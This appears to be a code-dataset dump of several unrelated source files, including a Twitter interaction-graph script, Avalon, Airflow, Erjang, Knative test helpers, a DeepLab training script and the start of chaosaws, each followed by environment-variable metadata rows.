min_score = 10
target_username = "tdxf20".lower()
interacted_users = {}
user_profil_url = {}
count = 0
def update_interacted_users(username, value, profil_url):
username = username.lower()
if username in interacted_users.keys():
interacted_users[username] += value
else:
interacted_users[username] = value
user_profil_url[username] = profil_url
try:
for status in tweepy.Cursor(api.user_timeline,screen_name=target_username,tweet_mode="extended").items():
tweettext = str(status.full_text.lower().encode("ascii",errors="ignore"))
if "rt @" in tweettext:
retweet_username = tweettext.split(":")[0].split("@")[1]
update_interacted_users(retweet_username, 3,None)
print(f"{retweet_username} gets 3 score")
continue
if not status.entities["user_mentions"]:
continue
for user in status.entities["user_mentions"]:
name = user["screen_name"]
print(f"{name} gets 2 score")
            update_interacted_users(name, 2, None)
if count == max_tweets_check_limit:
break
count += 1
except:
pass
try:
for status in tweepy.Cursor(api.favorites,screen_name=target_username).items():
print(f"{status.user.screen_name.lower()} gets 1 score")
update_interacted_users(status.user.screen_name.lower(), 1, status.user.profile_image_url)
if count == max_tweets_check_limit:
break
count += 1
except:
pass
interacted_users = {k:v for k,v in interacted_users.items() if v >= min_score and k != target_username}
user_profil_url = {k:v for k,v in user_profil_url.items() if k in interacted_users.keys()}
urllib.request.urlretrieve(api.get_user(target_username).profile_image_url,f"{target_username}.png")
for name, url in user_profil_url.items():
try:
if url == None:
user_profil_url[name] = api.get_user(name).profile_image_url
urllib.request.urlretrieve(user_profil_url[name],f"{name}.png")
else:
urllib.request.urlretrieve(user_profil_url[name],f"{name}.png")
except:
continue
bg = Image.new("RGBA", (1000,1000),color="yellow")
img = Image.open(f"{target_username}.png")
img_w, img_h = img.size
bg_w, bg_h = bg.size
offset = ((bg_w - img_w) // 2, (bg_h - img_h) //2)
full_circle = math.pi * 2
max_score = max(list(interacted_users.values()))
def map(old_value,old_min, old_max, new_min, new_max):
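    # Linear rescale from [old_min, old_max] to [new_min, new_max].
    # Illustrative example: map(5, 0, 10, 0, 100) == 50.0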
return (((old_value - old_min) * (new_max - new_min)) / (old_max - old_min)) + new_min
for name, score in interacted_users.items():
try:
random_angle = random.random() * full_circle
length = 1 - score / max_score
length = map(length, 0, 1, img_w, bg_w / 2 - img_w / 2)
x = math.cos(random_angle) * length
y = math.sin(random_angle) * length
x += bg_w / 2
y += bg_h / 2
print(x)
print(y)
bg.paste(Image.open(f"{name}.png"),(int(x),int(y)))
except Exception as e:
print(e)
print(name)
bg.paste(img,offset)
bg.save("result.png")
for path in glob.glob("*.png"):
if "result" not in path:
os.remove(path)
| []
| []
| [
"CONSUMER_KEY",
"CONSUMER_SECRET",
"ACCESS_TOKEN_SECRET",
"ACCESS_TOKEN"
]
| [] | ["CONSUMER_KEY", "CONSUMER_SECRET", "ACCESS_TOKEN_SECRET", "ACCESS_TOKEN"] | python | 4 | 0 | |
avalon/tools/widgets.py | import logging
from . import lib
from .models import AssetModel, RecursiveSortFilterProxyModel
from .views import DeselectableTreeView
from ..vendor import qtawesome
from ..vendor.Qt import QtWidgets, QtCore, QtGui
from .. import style
from .. import io
log = logging.getLogger(__name__)
class AssetWidget(QtWidgets.QWidget):
"""A Widget to display a tree of assets with filter
To list the assets of the active project:
>>> # widget = AssetWidget()
>>> # widget.refresh()
>>> # widget.show()
"""
silo_changed = QtCore.Signal(str) # on silo combobox change
assets_refreshed = QtCore.Signal() # on model refresh
selection_changed = QtCore.Signal() # on view selection change
current_changed = QtCore.Signal() # on view current index change
def __init__(self, silo_creatable=True, parent=None):
super(AssetWidget, self).__init__(parent=parent)
self.setContentsMargins(0, 0, 0, 0)
layout = QtWidgets.QVBoxLayout(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.setSpacing(4)
# Header
header = QtWidgets.QHBoxLayout()
silo = SiloTabWidget(silo_creatable=silo_creatable)
icon = qtawesome.icon("fa.refresh", color=style.colors.light)
refresh = QtWidgets.QPushButton(icon, "")
refresh.setToolTip("Refresh items")
header.addWidget(silo)
header.addStretch(1)
header.addWidget(refresh)
# Tree View
model = AssetModel()
proxy = RecursiveSortFilterProxyModel()
proxy.setSourceModel(model)
proxy.setFilterCaseSensitivity(QtCore.Qt.CaseInsensitive)
view = DeselectableTreeView()
view.setIndentation(15)
view.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
view.setHeaderHidden(True)
view.setModel(proxy)
filter = QtWidgets.QLineEdit()
filter.textChanged.connect(proxy.setFilterFixedString)
filter.setPlaceholderText("Filter assets..")
# Layout
layout.addLayout(header)
layout.addWidget(filter)
layout.addWidget(view)
# Signals/Slots
selection = view.selectionModel()
selection.selectionChanged.connect(self.selection_changed)
selection.currentChanged.connect(self.current_changed)
silo.silo_changed.connect(self._on_silo_changed)
refresh.clicked.connect(self.refresh)
self.refreshButton = refresh
self.silo = silo
self.model = model
self.proxy = proxy
self.view = view
def _on_silo_changed(self):
"""Callback for silo change"""
self._refresh_model()
silo = self.get_current_silo()
self.silo_changed.emit(silo)
self.selection_changed.emit()
def _refresh_model(self):
silo = self.get_current_silo()
with lib.preserve_expanded_rows(self.view,
column=0,
role=self.model.ObjectIdRole):
with lib.preserve_selection(self.view,
column=0,
role=self.model.ObjectIdRole):
self.model.set_silo(silo)
self.assets_refreshed.emit()
def refresh(self):
silos = _list_project_silos()
self.silo.set_silos(silos)
self._refresh_model()
def get_current_silo(self):
"""Returns the currently active silo."""
return self.silo.get_current_silo()
def get_active_asset(self):
"""Return the asset id the current asset."""
current = self.view.currentIndex()
return current.data(self.model.ObjectIdRole)
def get_active_index(self):
return self.view.currentIndex()
def get_selected_assets(self):
"""Return the assets' ids that are selected."""
selection = self.view.selectionModel()
rows = selection.selectedRows()
return [row.data(self.model.ObjectIdRole) for row in rows]
def set_silo(self, silo):
"""Set the active silo tab"""
self.silo.set_current_silo(silo)
def select_assets(self, assets, expand=True):
"""Select assets by name.
Args:
assets (list): List of asset names
expand (bool): Whether to also expand to the asset in the view
Returns:
None
"""
# TODO: Instead of individual selection optimize for many assets
assert isinstance(assets,
(tuple, list)), "Assets must be list or tuple"
# Clear selection
selection_model = self.view.selectionModel()
selection_model.clearSelection()
# Select
mode = selection_model.Select | selection_model.Rows
for index in lib.iter_model_rows(self.proxy,
column=0,
include_root=False):
data = index.data(self.model.ItemRole)
name = data["name"]
if name in assets:
selection_model.select(index, mode)
if expand:
self.view.expand(index)
# Set the currently active index
self.view.setCurrentIndex(index)
class SiloTabWidget(QtWidgets.QTabBar):
"""Silo widget
    Allows adding a silo via the "+" tab.
Note:
When no silos are present an empty stub silo is added to
use as the "blank" tab to start on, so the + tab becomes
clickable.
"""
silo_changed = QtCore.Signal(str)
silo_added = QtCore.Signal(str)
def __init__(self, silo_creatable=True, parent=None):
super(SiloTabWidget, self).__init__(parent=parent)
self.silo_creatable = silo_creatable
self._previous_tab_index = -1
self.set_silos([])
self.setContentsMargins(0, 0, 0, 0)
self.setFixedHeight(28)
font = QtGui.QFont()
font.setBold(True)
self.setFont(font)
self.currentChanged.connect(self.on_tab_changed)
def on_tab_changed(self, index):
if index == self._previous_tab_index:
return
# If it's the last tab
num = self.count()
if self.silo_creatable and index == num - 1:
self.on_add_silo()
self.setCurrentIndex(self._previous_tab_index)
return
silo = self.tabText(index)
self.silo_changed.emit(silo)
# Store for the next calls
self._previous_tab_index = index
def clear(self):
"""Removes all tabs.
Implemented similar to `QTabWidget.clear()`
"""
for i in range(self.count()):
self.removeTab(0)
def set_silos(self, silos):
current_silo = self.get_current_silo()
if not silos:
            # Add an empty stub tab to start on.
silos = [""]
# Populate the silos without emitting signals
self.blockSignals(True)
self.clear()
for silo in sorted(silos):
self.addTab(silo)
if self.silo_creatable:
# Add the "+" tab
self.addTab("+")
self.set_current_silo(current_silo)
self.blockSignals(False)
# Assume the current index is "fine"
self._previous_tab_index = self.currentIndex()
        # Only emit a silo changed signal if the current silo
        # after refresh is not the same as prior to it (e.g.
        # when the silo was removed, or similar).
if current_silo != self.get_current_silo():
self.currentChanged.emit(self.currentIndex())
def set_current_silo(self, silo):
"""Set the active silo by name or index.
Args:
silo (str or int): The silo name or index.
"""
# Already set
if silo == self.get_current_silo():
return
# Otherwise change the silo box to the name
for i in range(self.count()):
text = self.tabText(i)
if text == silo:
self.setCurrentIndex(i)
break
def get_current_silo(self):
index = self.currentIndex()
return self.tabText(index)
def on_add_silo(self):
silo, state = QtWidgets.QInputDialog.getText(self,
"Silo name",
"Create new silo:")
if not state or not silo:
return
self.add_silo(silo)
def get_silos(self):
"""Return the currently available silos"""
# Ignore first tab if empty
# Ignore the last tab because it is the "+" tab
silos = []
for i in range(self.count() - 1):
label = self.tabText(i)
if i == 0 and not label:
continue
silos.append(label)
return silos
def add_silo(self, silo):
# Add the silo
silos = self.get_silos()
silos.append(silo)
silos = list(set(silos)) # ensure unique
self.set_silos(silos)
self.silo_added.emit(silo)
self.set_current_silo(silo)
def _list_project_silos():
"""List the silos from the project's configuration"""
silos = io.distinct("silo")
if not silos:
project = io.find_one({"type": "project"})
log.warning("Project '%s' has no active silos", project["name"])
return list(sorted(silos))
| []
| []
| []
| [] | [] | python | null | null | null |
airflow/__main__.py | #!/usr/bin/env python
# PYTHON_ARGCOMPLETE_OK
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Main executable module"""
import os
import argcomplete
from airflow.cli import cli_parser
from airflow.configuration import conf
def main():
"""Main executable function"""
if conf.get("core", "security") == 'kerberos':
os.environ['KRB5CCNAME'] = conf.get('kerberos', 'ccache')
os.environ['KRB5_KTNAME'] = conf.get('kerberos', 'keytab')
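        # Illustrative airflow.cfg entries backing the lookups above (paths are placeholders):
        #   [kerberos]
        #   ccache = /tmp/airflow_krb5_ccache
        #   keytab = /etc/airflow/airflow.keytab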
parser = cli_parser.get_parser()
argcomplete.autocomplete(parser)
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
main()
| []
| []
| [
"KRB5_KTNAME",
"KRB5CCNAME"
]
| [] | ["KRB5_KTNAME", "KRB5CCNAME"] | python | 2 | 0 | |
src/main/java/erjang/ErjangCodeCache.java | /** -*- tab-width: 4 -*-
* This file is part of Erjang - A JVM-based Erlang VM
*
* Copyright (c) 2011 by Trifork
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
**/
package erjang;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.Collections;
import java.util.HashMap;
import java.util.LinkedList;
import java.util.Map;
import java.util.Queue;
import java.util.jar.JarOutputStream;
import java.util.logging.Logger;
import java.util.zip.ZipEntry;
import erjang.beam.BeamLoader;
import erjang.beam.Compiler;
import erjang.beam.RamClassRepo;
public class ErjangCodeCache {
static final Logger log = Logger.getLogger("erjang.beam.cache");
// Config:
static final String ERJ_CACHE_DIR;
static final boolean useAsyncPersisting;
static final boolean useSyncPersisting;
static final Persister persister;
static {
String cacheDir = System.getenv("ERJ_CACHE_DIR");
if (cacheDir == null) cacheDir = System.getProperty("user.home");
ERJ_CACHE_DIR = cacheDir;
String mode = System.getProperty("erjang.codecache.mode");
if ("async".equals(mode)) {
useAsyncPersisting = true;
useSyncPersisting = false;
} else if ("sync".equals(mode)) {
useAsyncPersisting = false;
useSyncPersisting = true;
} else if ("off".equals(mode)) {
useAsyncPersisting = false;
useSyncPersisting = false;
} else {
// TODO: Warn?
// Default to 'async':
useAsyncPersisting = true;
useSyncPersisting = false;
} // Other values which might make sense: 'read-only', 'existing-only'
if (useAsyncPersisting) {
persister = new Persister();
Thread t = new Thread(persister, "Erjang Code Cache Persister");
t.setDaemon(true);
t.setPriority(Thread.MIN_PRIORITY);
t.start();
} else persister = null;
}
private static Map<String, RamClassRepo> cache = Collections.synchronizedMap(new HashMap<String, RamClassRepo>());
public static EModuleClassLoader getModuleClassLoader(String moduleName, EBinary beam_data, BeamLoader beam_parser) throws IOException {
long crc = beam_data.crc();
// crc ^= BIFUtil.all_bif_hash();
File jarFile = new File(erjdir(), moduleJarFileName(moduleName, crc));
if (jarFile.exists()) {
return new EModuleClassLoader(jarFile.toURI().toURL());
}
RamClassRepo repo = new RamClassRepo();
try {
Compiler.compile(beam_parser.load(beam_data.getByteArray()), repo);
repo.close();
cache.put(moduleName, repo);
if (useAsyncPersisting) persister.enqueue(jarFile, repo);
else if (useSyncPersisting) persister.persist(jarFile, repo);
} finally {
			try {
				repo.close();
				// jarFile.delete();
			} catch (Exception e) {}
}
return new EModuleClassLoader(jarFile.toURI().toURL(), repo);
}
static File erjdir() throws IOException {
File home = ERT.newFile(ERJ_CACHE_DIR);
File dir = new File(home, ".erjang");
if (!dir.exists()) {
if (!dir.mkdirs())
throw new IOException("cannot create " + dir);
} else if (!dir.canWrite()) {
throw new IOException("cannot write to " + dir);
}
return dir;
}
public static String moduleJarFileName(String moduleName, long crc) {
return moduleFileName(moduleName, crc, "jar");
}
/*
static String moduleJarBackupFileName(String moduleName, long crc) {
return moduleFileName(moduleName, crc, "ja#");
}
*/
static String moduleFileName(String moduleName, long crc, String extension) {
return mangle(moduleName)
+ "-" + Long.toHexString(crc)
+ "." + extension;
}
	/** Mangle string so that the result contains only [A-Za-z0-9_$.-]. */
static String mangle(String s) {
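		// Illustrative example (the input is a placeholder): mangle("lists:sort/2") -> "lists$3a$sort$2f$2"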
// TODO: Faster handling of the normal case.
StringBuffer sb = new StringBuffer();
for (int i=0; i<s.length(); i++) {
char c = s.charAt(i);
if (('a' <= c && c <= 'z') ||
('A' <= c && c <= 'Z') ||
('0' <= c && c <= '9') ||
c == '-' ||
c == '.' ||
c == '_')
sb.append(c);
else
sb.append('$').append(Integer.toHexString(c)).append('$');
}
return sb.toString();
}
static class PersistRequest { // Just a Pair<File,RamClassRepo>, really.
final File file;
final RamClassRepo repo;
public PersistRequest(File file, RamClassRepo repo) {
this.file = file;
this.repo = repo;
}
}
static class Persister implements Runnable {
final Queue<PersistRequest> queue = new LinkedList<PersistRequest>();
public void run() {
while (true) {
PersistRequest request;
synchronized (queue) {
while ((request = queue.poll()) == null) {
try { queue.wait(); }
catch (InterruptedException ie) {}
}
}
persist(request.file, request.repo);
}
}
void enqueue(File file, RamClassRepo repo) {
synchronized (queue) {
queue.add(new PersistRequest(file, repo));
queue.notify();
}
}
static void persist(File file, RamClassRepo repo) {
try {
File tmpFile = File.createTempFile(file.getName(), "tmp",
file.getParentFile());
JarOutputStream jo = new JarOutputStream(new FileOutputStream(tmpFile));
jo.setLevel(0);
for (Map.Entry<String,byte[]> e : repo.entrySet()) {
String classFilename = e.getKey() + ".class";
byte[] classContents = e.getValue();
jo.putNextEntry(new ZipEntry(classFilename));
jo.write(classContents);
jo.closeEntry();
}
jo.close();
tmpFile.renameTo(file);
} catch (IOException ioe) {
log.warning("Warning: Failed to store cached module in "+file);
}
}
}
}
| [
"\"ERJ_CACHE_DIR\""
]
| []
| [
"ERJ_CACHE_DIR"
]
| [] | ["ERJ_CACHE_DIR"] | java | 1 | 0 | |
my_tiny_ekf/graph_maker.py |
# * MakeGraphUsingTinyEKFDLL
# *
# * Copyright (C) 2022 DukiChoi
# *
# * MIT License
# -*- coding: utf-8 -*-
from calendar import c
from inspect import _void
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
# Data Load
import serial
import time
import signal
import threading
import ctypes
from ctypes import *
import os
#os.add_dll_directory(os.getcwd())
os.environ['PATH'] = './lib.dll' + os.pathsep + os.environ['PATH']
i = c_double(0)
pi = pointer(i)
x = []
y = []
z = []
port = 'COM6'
baud = 9600
exitThread = False
# %%
# ANIMATION FUNCTION
def func(num, dataSet, line, redDots):
# NOTE: there is no .set_data() for 3 dim data...
line.set_data(dataSet[0:2, :num])
line.set_3d_properties(dataSet[2, :num])
redDots.set_data(dataSet[0:2, :num])
redDots.set_3d_properties(dataSet[2, :num])
return line
# %%
def handler(signum, frame):
exitThread = True
# Function to parse the incoming data
def parsing_data(data):
tmp = ''.join(data)
print(tmp)
# Reader thread: consumes serial data and splits it into x/y/z
def readThread(ser):
global line
global exitThread
global x
global y
global z
while not exitThread:
idx = 0
for c in ser.read():
if idx % 3 == 0:
x.append(float(c))
elif idx % 3 == 1:
y.append(float(c))
else:
z.append(float(c))
idx = idx + 1
# %% [markdown]
#
# %% [markdown]
#
# %%
# %%
if __name__ == "__main__":
# %%
    # Register the exit signal handler
# signal.signal(signal.SIGINT, handler)
#
# ser = serial.Serial(port, baud, timeout=0)
# if ser.readable():
# res = ser.readline()
# # print(res)
#
# thread = threading.Thread(target=readThread, args=(ser,))
# thread.start()
#
# plot
    # Read the data file into a pandas DataFrame (converted to CSV below)
    ##### Set the txt file name and the number of data samples here #####
##############################################
file_name = "circle_test2"
##############################################
    # Changing the number of samples requires rebuilding the DLL; it is set to 100 samples by default.
data_amount = 100
    # Convert the txt file to CSV and read the 9-axis data
df = pd.read_csv('./test_files/' + file_name + '.txt', sep = '\t')
df.to_csv(r'./test_files/'+ file_name + '.csv')
new_df = pd.read_csv('./test_files/'+ file_name + '.csv')
m = new_df.values
#print(m)
data_matrix1 = m[0:data_amount, 3:6].astype(np.float64)
data_matrix2 = m[0:data_amount, 6:9].astype(np.float64)
data_matrix3 = m[0:data_amount, 13:16].astype(np.float64)
print("입력값 A행렬:\n" , data_matrix1)
print("입력값 W행렬:\n" , data_matrix2)
print("입력값 H행렬:\n" , data_matrix3)
#입력 배열 포인터에 할당하기
filter1 = np.array(data_matrix1, dtype=np.float64)
pointer_a = filter1.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter2 = np.array(data_matrix2, dtype=np.float64)
pointer_b = filter2.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
filter3 = np.array(data_matrix3, dtype=np.float64)
pointer_c = filter3.ctypes.data_as(ctypes.POINTER(ctypes.c_double*(data_amount*3)))
    # Use ctypes to call the DLL function with the 9-axis data: three input arrays in, one output array back
print("Dll function call")
libc = ctypes.CDLL('./Dll_lib.dll')
    # Function input format: 900 double values (three pointers, each carrying data_amount*3 doubles)
    libc.make_string.argtypes = [ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3)), ctypes.POINTER(ctypes.c_double*(data_amount*3))]
    # Function output format: 300 double values
libc.make_string.restype = ctypes.POINTER(ctypes.c_double*(data_amount*3))
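    # Illustrative shapes (assuming data_amount == 100): each input pointer carries a flattened
    # (100, 3) matrix, i.e. 300 doubles; the returned pointer holds the filtered output S as
    # another flattened (100, 3) matrix, which is unpacked into the x/y/z lists below.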
arrayptr = libc.make_string(pointer_a, pointer_b, pointer_c)
c_array = [x for x in arrayptr.contents]
print("S행렬 출력: ", len(c_array), "개 \n", c_array)
# #여기는 실험영역...
# # ctypes로 python배열에서 c++ 포인터 배열로 바꾸기. c++로 구현해야함.
# filter = np.array([[1, 0, 1], [1, 0, 1], [1, -1, 0]], dtype=np.float64)
# a = filter.ctypes.data_as(ctypes.POINTER(ctypes.c_double*9))
# print([x for x in a.contents])
    # Unpack the c_array values into x/y/z lists
idx =0
for c in c_array:
if idx %3 ==0 :
x.append(c)
elif idx%3 ==1:
y.append(c)
elif idx%3 ==2:
z.append(c)
idx = idx + 1
dataSet = np.array([x, y, z])
#print(x)
#print(y)
#print(z)
numDataPoints = 100
# GET SOME MATPLOTLIB OBJECTS
fig = plt.figure()
ax = Axes3D(fig)
redDots = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='r', marker='o')[0] # For scatter plot
# NOTE: Can't pass empty arrays into 3d version of plot()
line = plt.plot(dataSet[0], dataSet[1], dataSet[2], lw=2, c='g')[0] # For line plot
# AXES PROPERTIES]
ax.set_xlim3d([-10, 10])
ax.set_ylim3d([-10, 10])
ax.set_zlim3d([-10, 10])
ax.set_xlabel('X(t)')
ax.set_ylabel('Y(t)')
ax.set_zlabel('Z(t)')
ax.set_title('Trajectory of electron for E vector along [120]')
# Creating the Animation object
line_ani = animation.FuncAnimation(fig, func, frames=numDataPoints, fargs=(dataSet, line, redDots), interval=50,
blit=False)
# line_ani.save(r'Animation.mp4')
plt.show()
| []
| []
| [
"PATH"
]
| [] | ["PATH"] | python | 1 | 0 | |
lib/test/integration.go | // Copyright 2019 The Knative Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package test
import (
"fmt"
"os"
"regexp"
"strconv"
"strings"
"sync"
"testing"
"time"
)
const (
MaxRetries int = 10
RetrySleepDuration time.Duration = 5 * time.Second
)
var nsMutex sync.Mutex
var serviceMutex sync.Mutex
var serviceCount int
var namespaceCount int
// KnTest type
type KnTest struct {
namespace string
kn Kn
}
// NewKnTest creates a new KnTest object
func NewKnTest() (*KnTest, error) {
ns := ""
	// try the next 20 namespaces before giving up on creating a namespace if it already exists
for i := 0; i < 20; i++ {
ns = NextNamespace()
err := CreateNamespace(ns)
if err == nil {
break
}
if strings.Contains(err.Error(), "AlreadyExists") {
continue
} else {
return nil, err
}
}
err := WaitForNamespaceCreated(ns)
if err != nil {
return nil, err
}
return &KnTest{
namespace: ns,
kn: Kn{ns},
}, nil
}
// Teardown cleans up
func (test *KnTest) Teardown() error {
return DeleteNamespace(test.namespace)
}
// Kn object used by this KnTest
func (test *KnTest) Kn() Kn {
return test.kn
}
// Namespace used by the test
func (test *KnTest) Namespace() string {
return test.namespace
}
// Public functions
// NextNamespace returns the next unique namespace
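// With KN_E2E_NAMESPACE unset it yields "kne2etests0", "kne2etests1", ... (illustrative).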
func NextNamespace() string {
ns := os.Getenv("KN_E2E_NAMESPACE")
if ns == "" {
ns = "kne2etests"
}
return fmt.Sprintf("%s%d", ns, GetNextNamespaceId())
}
// GetNextNamespaceId returns the next unique ID for the next namespace
func GetNextNamespaceId() int {
nsMutex.Lock()
defer nsMutex.Unlock()
current := namespaceCount
namespaceCount++
return current
}
// GetNextServiceName returns the next unique service name built from the given base
func GetNextServiceName(base string) string {
serviceMutex.Lock()
defer serviceMutex.Unlock()
current := serviceCount
serviceCount++
return base + strconv.Itoa(current)
}
// CreateNamespace creates a namespace and verifies the creation by invoking kubectl
func CreateNamespace(namespace string) error {
expectedOutputRegexp := fmt.Sprintf("namespace?.+%s.+created", namespace)
out, err := createNamespaceWithRetry(namespace, MaxRetries)
if err != nil {
return fmt.Errorf("could not create namespace %s: %w", namespace, err)
}
// check that last output indeed show created namespace
matched, err := matchRegexp(expectedOutputRegexp, out)
if err != nil {
return err
}
if !matched {
return fmt.Errorf("Expected output incorrect, expecting to include:\n%s\n Instead found:\n%s\n", expectedOutputRegexp, out)
}
return nil
}
// DeleteNamespace deletes a namespace and verifies the deletion by invoking kubectl
func DeleteNamespace(namespace string) error {
kubectl := Kubectl{namespace}
out, err := kubectl.Run("delete", "namespace", namespace)
if err != nil {
return fmt.Errorf("Cannot delete namespace %s: %w", namespace, err)
}
expectedOutputRegexp := fmt.Sprintf("namespace?.+%s.+deleted", namespace)
matched, err := matchRegexp(expectedOutputRegexp, out)
if err != nil {
return err
}
if !matched {
return fmt.Errorf("Expected output incorrect, expecting to include:\n%s\n Instead found:\n%s\n", expectedOutputRegexp, out)
}
return nil
}
// WaitForNamespaceDeleted waits until the namespace is deleted
func WaitForNamespaceDeleted(namespace string) error {
deleted := checkNamespace(namespace, false, MaxRetries)
if !deleted {
return fmt.Errorf("error deleting namespace %s, timed out after %d retries", namespace, MaxRetries)
}
return nil
}
// WaitForNamespaceCreated wait until namespace is created
func WaitForNamespaceCreated(namespace string) error {
created := checkNamespace(namespace, true, MaxRetries)
if !created {
return fmt.Errorf("error creating namespace %s, timed out after %d retries", namespace, MaxRetries)
}
return nil
}
func CurrentDir(t *testing.T) string {
dir, err := os.Getwd()
if err != nil {
t.Fatal("Unable to read current dir:", err)
}
return dir
}
// Private functions
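// checkNamespace polls `kubectl get namespace` until the namespace reaches the
// desired state (created or deleted) or the retry budget is exhausted.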
func checkNamespace(namespace string, created bool, maxRetries int) bool {
retries := 0
for retries < maxRetries {
output, _ := Kubectl{}.Run("get", "namespace")
// check for namespace deleted
if !created && !strings.Contains(output, namespace) {
return true
}
// check for namespace created
if created && strings.Contains(output, namespace) {
return true
}
retries++
time.Sleep(RetrySleepDuration)
}
return false
}
func createNamespaceWithRetry(namespace string, maxRetries int) (string, error) {
var (
retries int
err error
out string
)
for retries < maxRetries {
out, err = Kubectl{}.Run("create", "namespace", namespace)
if err == nil {
return out, nil
}
retries++
time.Sleep(RetrySleepDuration)
}
return out, err
}
func matchRegexp(matchingRegexp, actual string) (bool, error) {
matched, err := regexp.MatchString(matchingRegexp, actual)
if err != nil {
return false, fmt.Errorf("failed to match regexp %q: %w", matchingRegexp, err)
}
return matched, nil
}
| [
"\"KN_E2E_NAMESPACE\""
]
| []
| [
"KN_E2E_NAMESPACE"
]
| [] | ["KN_E2E_NAMESPACE"] | go | 1 | 0 | |
train.py | # -*- coding: utf-8 -*-
import os
import tensorflow as tf
import shutil
from deeplabv3plus import model
from dataset import Dataset
from config import cfg
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
log = cfg.TRAIN.LOGDIR
EPOCHS = cfg.TRAIN.EPOCHS
save_every_n_epoch = cfg.TRAIN.SAVE_EPOCH
if os.path.exists(log): shutil.rmtree(log)
if __name__ == '__main__':
# GPU settings
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
TrainSet = Dataset('train')
model = model(depthwise=True, backbone='mobilenetv2')
if os.listdir('./saved_weights'):
latest_weight = tf.train.latest_checkpoint('./saved_weights')
# latest_weight = r"./saved_model/epoch-14"
model.load_weights(latest_weight)
# define loss and optimizer
loss_object = tf.keras.losses.SparseCategoricalCrossentropy()
optimizer = tf.keras.optimizers.Adam(lr=1e-5)
train_loss = tf.keras.metrics.Mean(name='train_loss')
train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')
miou = tf.keras.metrics.MeanIoU(num_classes=21, name='miou')
summary_writer = tf.summary.create_file_writer(logdir='tensorboard')  # instantiate the summary writer
tf.summary.trace_on(profiler=True)
# @tf.function
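# Performs a single training step: forward pass, loss computation,
# back-propagation and metric updates for one batch.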
def train_step(image_batch, label_batch):
with tf.GradientTape() as tape:
predictions = model(image_batch)
loss = loss_object(y_true=label_batch, y_pred=predictions)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(grads_and_vars=zip(gradients, model.trainable_variables))
train_loss.update_state(values=loss)
train_accuracy.update_state(y_true=label_batch, y_pred=predictions)
miou.update_state(y_true=label_batch, y_pred=tf.argmax(predictions, axis=-1))
# start training
step = 0
for epoch in range(EPOCHS):
for img, labels in TrainSet:
train_step(img, labels)
print("Epoch: {}/{}, step:{}, loss: {:.5f}, accuracy: {:.5f}, miou: {:.5f}".format(epoch + 1,
EPOCHS,
step,
train_loss.result().numpy(),
train_accuracy.result().numpy(),
miou.result().numpy()))
with summary_writer.as_default():
tf.summary.scalar("loss", train_loss.result().numpy(), step=step)
step += 1
if (epoch+1) % save_every_n_epoch == 0:
model.save_weights(filepath='./saved_model' + "/epoch-{}".format(epoch), save_format='tf')
tf.saved_model.save(model, 'FCN8s.h5')
'''
optimizer = tf.keras.optimizers.Adam(learning_rate=1e-6)
model.compile(loss='categorical_crossentropy', optimizer=optimizer,
metrics=[tf.keras.metrics.CategoricalAccuracy(name='accuracy'),
tf.keras.metrics.MeanIoU(num_classes=21, name="meanIoU")],
experimental_run_tf_function=False
)
model.fit_generator(TrainSet, steps_per_epoch=416, epochs=10)
model.save_weights('./deeplabv3plus')
'''
| []
| []
| [
"CUDA_VISIBLE_DEVICES"
]
| [] | ["CUDA_VISIBLE_DEVICES"] | python | 1 | 0 | |
chaosaws/__init__.py | # -*- coding: utf-8 -*-
import os
from typing import Any, Dict, List
import boto3
import requests
from aws_requests_auth.aws_auth import AWSRequestsAuth
from aws_requests_auth.boto_utils import BotoAWSRequestsAuth
from botocore import parsers
from chaosaws.types import AWSResponse
from chaoslib.discovery.discover import (discover_actions, discover_probes,
initialize_discovery_result)
from chaoslib.exceptions import DiscoveryFailed, InterruptExecution
from chaoslib.types import (Configuration, DiscoveredActivities,
DiscoveredSystemInfo, Discovery, Secrets)
from logzero import logger
__version__ = '0.15.1'
__all__ = ["__version__", "discover", "aws_client", "signed_api_call"]
def get_credentials(secrets: Secrets = None) -> Dict[str, str]:
"""
Credentials may be provided via the secrets object. When they aren't,
they will be loaded from the process environment (for instance, read from
`~/.aws/credentials`).
See: https://boto3.readthedocs.io/en/latest/guide/configuration.html#guide-configuration
""" # noqa: E501
creds = dict(
aws_access_key_id=None, aws_secret_access_key=None,
aws_session_token=None)
if secrets:
creds["aws_access_key_id"] = secrets.get("aws_access_key_id")
